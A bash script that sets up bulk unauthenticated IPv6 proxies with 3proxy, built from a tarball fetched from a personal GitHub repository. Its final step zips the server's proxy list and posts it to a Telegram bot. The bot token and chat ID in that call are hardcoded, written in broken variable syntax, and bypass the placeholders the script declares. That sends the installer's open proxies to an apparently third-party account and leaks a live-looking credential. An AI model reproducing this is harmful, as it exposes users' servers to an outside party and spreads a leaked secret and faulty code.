#!/bin/bash

TOKEN="YOUR_BOT_TOKEN"
CHAT_ID="YOUR_CHAT_ID"

random() {
	tr </dev/urandom -dc A-Za-z0-9 | head -c5
	echo
}

array=(1 2 3 4 5 6 7 8 9 0 a b c d e f)
gen64() {
	ip64() {
		echo "${array[$(shuf -i 0-15 -n 1)]}${array[$(shuf -i 0-15 -n 1)]}${array[$(shuf -i 0-15 -n 1)]}${array[$(shuf -i 0-15 -n 1)]}"
	}
	echo "$1:$(ip64):$(ip64):$(ip64):$(ip64)"
}

install_3proxy() {
    echo "installing 3proxy"
    URL="https://raw.githubusercontent.com/quayvlog/quayvlog/main/3proxy-3proxy-0.8.6.tar.gz"
    wget -qO- $URL | bsdtar -xvf-
    cd 3proxy-3proxy-0.8.6
    make -f Makefile.Linux
    mkdir -p /usr/local/etc/3proxy/{bin,logs,stat}
    cp src/3proxy /usr/local/etc/3proxy/bin/
    cp ./scripts/rc.d/proxy.sh /etc/init.d/3proxy
    chmod +x /etc/init.d/3proxy
    systemctl enable 3proxy
    cd $WORKDIR
}

gen_3proxy() {
    cat <<EOF
daemon
maxconn 1000
nscache 65536
timeouts 1 5 30 60 180 1800 15 60
setgid 65535
setuid 65535
flush

$(awk -F "/" '{print "proxy -6 -n -a -p" $4 " -i" $3 " -e"$5"\n" }' ${WORKDATA})
EOF
}

gen_proxy_file() {
    awk -F "/" '{print $3 ":" $4 }' ${WORKDATA} > proxy.txt
}

upload_proxy_to_telegram() {
    local PASS=$(random)
    zip --password $PASS proxy.zip proxy.txt
    curl -F chat_id="${5257679444}" -F document=@"proxy.zip" "https://api.telegram.org/bot${6993056063:AAFPwvXwIaysQ4_LbBalYWz77gXwVGk8Jrc}/sendDocument"
    rm proxy.zip
    echo "Proxy is ready! Format IP:PORT"
    echo "Sent the proxy list to Telegram bot."
}

gen_data() {
    seq $FIRST_PORT $LAST_PORT | while read port; do
        echo "$IP4/$port/$(gen64 $IP6)"
    done
}

gen_iptables() {
    awk -F "/" '{print "iptables -I INPUT -p tcp --dport " $2 "  -m state --state NEW -j ACCEPT"}' ${WORKDATA}
}

gen_ifconfig() {
    awk -F "/" '{print "ifconfig eth0 inet6 add " $3 "/64"}' ${WORKDATA}
}

# Main script
echo "Installing required packages..."
yum -y install gcc net-tools bsdtar zip >/dev/null

echo "Installing 3proxy..."
install_3proxy

echo "Creating working folder..."
WORKDIR="/home/proxy-installer"
WORKDATA="${WORKDIR}/data.txt"
mkdir -p $WORKDIR && cd $WORKDIR

echo "Getting IP addresses..."
IP4=$(curl -4 -s icanhazip.com)
IP6=$(curl -6 -s icanhazip.com | cut -f1-4 -d':')
echo "Internal IP: ${IP4}. External sub for IP6: ${IP6}"

echo "How many proxies do you want to create? Example: 500"
read COUNT

FIRST_PORT=10000
LAST_PORT=$(($FIRST_PORT + $COUNT))

echo "Generating proxy data..."
gen_data >$WORKDATA

echo "Generating iptables rules..."
gen_iptables >$WORKDIR/boot_iptables.sh

echo "Generating ifconfig commands..."
gen_ifconfig >$WORKDIR/boot_ifconfig.sh

echo "Configuring 3proxy..."
gen_3proxy >/usr/local/etc/3proxy/3proxy.cfg

echo "Configuring system startup..."
cat >>/etc/rc.local <<EOF
bash ${WORKDIR}/boot_iptables.sh
bash ${WORKDIR}/boot_ifconfig.sh
ulimit -n 10048
service 3proxy restart
EOF

echo "Starting services..."
bash /etc/rc.local

echo "Generating proxy file..."
gen_proxy_file

echo "Uploading proxy list to Telegram..."
upload_proxy_to_telegram

echo "Setup complete."
